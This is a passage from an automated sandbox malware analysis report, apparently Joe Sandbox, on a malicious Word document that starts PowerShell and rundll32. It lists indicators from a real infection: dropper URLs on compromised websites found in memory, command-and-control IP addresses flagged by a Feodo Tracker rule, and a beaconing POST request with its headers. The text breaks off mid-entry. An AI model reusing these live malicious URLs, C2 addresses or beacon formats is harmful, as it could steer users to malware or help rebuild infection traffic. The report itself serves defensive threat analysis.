Source: C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dllJoe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\mscorlib.pdb.dll source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb* source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2088678601.0000000002840000.00000002.00000001.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: global trafficDNS query: name: remediis.com
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.2.81.171:443
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.2.81.171:443

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2404340 ET CNC Feodo Tracker Reported CnC Server TCP group 21 192.168.2.22:49168 -> 71.72.196.159:80
Potential dropper URLs found in powershell memoryShow sources
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmpString found in memory: https://remediis.com/t/gm2X/
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmpString found in memory: http://avadnansahin.com/wp-includes/w/
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmpString found in memory: http://solicon.us/allam-cycle-1c4gn/f5z/
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmpString found in memory: http://www.riparazioni-radiotv.com/softaculous/DZz/
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmpString found in memory: http://www.agricampeggiocortecomotto.it/wp-admin/s7p1/
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmpString found in memory: https://www.starlingtechs.com/GNM/
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmpString found in memory: http://hellas-darmstadt.de/cgi-bin/ZSoo/
Source: global trafficHTTP traffic detected: GET /wp-includes/w/ HTTP/1.1Host: avadnansahin.comConnection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 71.72.196.159 71.72.196.159
Source: Joe Sandbox ViewIP Address: 71.72.196.159 71.72.196.159
Source: Joe Sandbox ViewASN Name: AEROTEK-ASTR AEROTEK-ASTR
Source: Joe Sandbox ViewASN Name: TWC-10796-MIDWESTUS TWC-10796-MIDWESTUS
Source: Joe Sandbox ViewASN Name: ALASTYRTR ALASTYRTR
Source: global trafficHTTP traffic detected: POST /fumwyj93myhz6vi/3lptbz7/e6hqkyw77ui/dujy6/2toe6aqef56s/cxrwnsqx/ HTTP/1.1DNT: 0Referer: 69.49.88.46/fumwyj93myhz6vi/3lptbz7/e6hqkyw77ui/dujy6/2toe6aqef56s/cxrwnsqx/Content-Type: multipart/form-data; boundary=-------------------HZtvsb4iqah9tnyW329User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 69.49.88.46Content-Length: 5492Connection: Keep-AliveCache-Control: no-cache
Source: unknownTCP traffic detected without corresponding DNS query: 71.72.196.159
Source: unknownTCP traffic detected without corresponding DNS query: 71.72.196.159
Source: unknownTCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknownTCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknownTCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknownTCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknownTCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknownTCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknownTCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknownTCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknownTCP traffic detected without corresponding DNS query: 69.49.88.46
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4AB68257-B28F-4AE5-86AD-026C320EA73C}.tmpJump to behavior
Source: global trafficHTTP traffic detected: GET /wp-includes/w/ HTTP/1.1Host: avadnansahin.comConnection: Keep-Alive
Source: rundll32.exe, 00000006.00000002.2092559720.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089009552.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknownDNS traffic detected: queries for: remediis.com
Source: unknownHTTP traffic detected: POST /fumwyj93myhz6vi/3lptbz7/e6hqkyw77ui/dujy6/2toe6aqef56s/cxrwnsqx/ HTTP/1.1DNT: 0Referer: 69.49.88.46/fumwyj93myhz6vi/3lptbz7/e6hqkyw77ui/dujy6/2toe6aqef56s/cxrwnsqx/Content-Type: multipart/form-data; boundary=-------------------HZtvsb4iqah9tnyW329User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 69.49.88.46Content-Length: 5492Connection: Keep-AliveCache-Control: no-cache
Source: powershell.exe, 00000005.00000002.2093523040.0000000003C70000.00000004.00000001.sdmpString found in binary or memory: http://avadnansahin.com
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmpString found in binary or memory: http://avadnansahin.com/wp-includes/w/
Source: powershell.exe, 00000005.00000002.2093523040.0000000003C70000.00000004.00000001.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: powershell.exe, 00000005.00000002.2093523040.0000000003C70000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmpString found in binary or memory: http://hellas-darmstadt.de/cgi-bin/ZSoo/
Source: rundll32.exe, 00000006.00000002.2092559720.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089009552.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2092559720.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089009552.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000006.00000002.2092843874.000